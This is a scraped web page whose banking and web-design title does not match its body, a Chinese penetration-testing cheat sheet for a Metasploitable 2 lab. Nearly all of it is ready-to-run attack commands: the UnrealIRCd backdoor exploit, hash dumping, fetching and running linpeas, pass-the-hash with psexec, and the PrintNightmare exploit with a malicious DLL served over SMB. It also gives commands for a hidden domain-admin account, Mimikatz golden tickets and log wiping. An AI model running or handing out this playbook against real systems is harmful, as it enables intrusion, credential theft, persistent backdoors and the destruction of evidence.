建设银行网银网站特色定制网页制作公司
张小明 2026/1/11 15:11:58
建设银行网银网站特色,定制网页制作公司,英文网站建设风格特点,网站建设的软件介绍本速查表基于之前的 VulhubMetasploitable 2 靶场实操清单#xff0c;涵盖从外网突破到持久化的全流程命令#xff0c;可直接复制执行。环境说明#xff1a;攻击机 Kali#xff08;192.168.56.101#xff09;、跳板机 Metasploitable 2#xff08;192.168.56.102#xf…本速查表基于之前的VulhubMetasploitable 2 靶场实操清单涵盖从外网突破到持久化的全流程命令可直接复制执行。环境说明攻击机 Kali192.168.56.101、跳板机 Metasploitable 2192.168.56.102、域控制器192.168.56.103、域内主机192.168.56.104一、 外网突破获取跳板机权限1. 端口扫描与漏洞发现bash运行# nmap 全端口版本扫描 nmap -sV -p- 192.168.56.102 # 搜索 UnrealIRCd 漏洞模块msfconsole 内执行 msfconsole search unrealircd use exploit/unix/irc/unrealircd_3281_backdoor set RHOSTS 192.168.56.102 run2. 获取 Meterpreter 会话后基础操作bash运行# 查看跳板机系统信息 sysinfo # 切换到系统 shell shell # 后台挂起会话返回 msfconsole background二、 内网信息收集1. 内网存活主机探测bash运行# Meterpreter 内执行 ping 扫描 run post/multi/gather/ping_sweep RHOSTS192.168.56.0/24 # 手动 ARP 扫描Kali 本机执行 arp-scan -l # 扫描当前网段 fping -g 192.168.56.0/24 # 批量 ping 探测2. 域环境信息枚举bash运行# 检测是否存在域跳板机 shell 内执行 ipconfig /all # 查看 DNS 后缀 net config workstation # 查询域控制器列表 nltest /dclist:test.com # Impacket 工具查询域用户Kali 执行 python3 /usr/share/doc/python3-impacket/examples/net.py user /domain -target-ip 192.168.56.103 # BloodHound 可视化域权限Kali 执行 bloodhound # 启动工具导入域信息3. 主机详细信息收集系统类型核心命令Windowssysteminfo系统补丁netstat -ano网络连接tasklist /svc进程服务Linuxuname -a内核版本ps -ef进程find / -perm -us -type f 2/dev/nullSUID 文件三、 横向移动哈希传递攻击PTH1. 提取目标用户哈希bash运行# Windows 主机哈希提取Meterpreter 内 run post/windows/gather/hashdump # Linux 主机凭证扫描跳板机 shell 内 wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh chmod x linpeas.sh ./linpeas.sh2. Impacket PTH 横向移动Kali 执行bash运行# 格式psexec.py 域名/用户名目标IP -hashes LM哈希:NTLM哈希 python3 /usr/share/doc/python3-impacket/examples/psexec.py test.com/user1192.168.56.104 -hashes aad3b435b51404eeaad3b435b51404ee:1234567890abcdef1234567890abcdef # 若获取明文密码直接登录 WinRM evil-winrm -i 192.168.56.104 -u user1 -p Pssw0rd!四、 权限提升PrintNightmare 漏洞利用1. 攻击机准备恶意 DLL 与 SMB 共享bash运行# 下载漏洞利用脚本 git clone https://github.com/cube0x0/CVE-2021-34527.git cd CVE-2021-34527 # 启动 SMB 共享供靶机下载 DLL impacket-smbserver share . -smb2support2. 靶机执行提权命令Windows 10 主机 shell 内cmd# 挂载攻击机 SMB 共享 net use \\192.168.56.101\share # 执行提权脚本获取 SYSTEM 权限 CVE-2021-34527.exe \\192.168.56.101\share\malicious.dll五、 持久化域内留后门1. 创建隐藏域管理员账户cmd# 在域控制器执行创建带 $ 隐藏账户 net user hidden_admin Pssw0rd! /add /domain net group Domain Admins hidden_admin /add /domain2. 生成黄金票据Mimikatz 执行bash运行# 提取 KRBTGT 账户哈希 mimikatz.exe lsadump::lsa /inject /name:krbtgt exit # 生成黄金票据替换 SID 和哈希值 mimikatz.exe kerberos::golden /domain:test.com /sid:S-1-5-21-xxxxxx /krbtgt:哈希值 /user:backdoor /ptt exit六、 痕迹清理1. Windows 日志清理cmd# 清空系统、安全、应用日志 wevtutil cl System wevtutil cl Security wevtutil cl Application2. Linux 日志清理bash运行# 清空 SSH 登录日志和系统日志 echo /var/log/auth.log echo /var/log/syslog # 清空命令历史记录 history -c history -w七、 常用工具命令速查工具用途命令Impacket 横向移动python3 wmiexec.py test.com/admin192.168.56.104 -hashes 哈希值密码哈希破解john --formatNT --wordlist/usr/share/wordlists/rockyou.txt hash.txt端口扫描masscan 192.168.56.0/24 -p 135,445,3389 --rate1000提权扫描./PrivescCheck.ps1Windows./linpeas.shLinux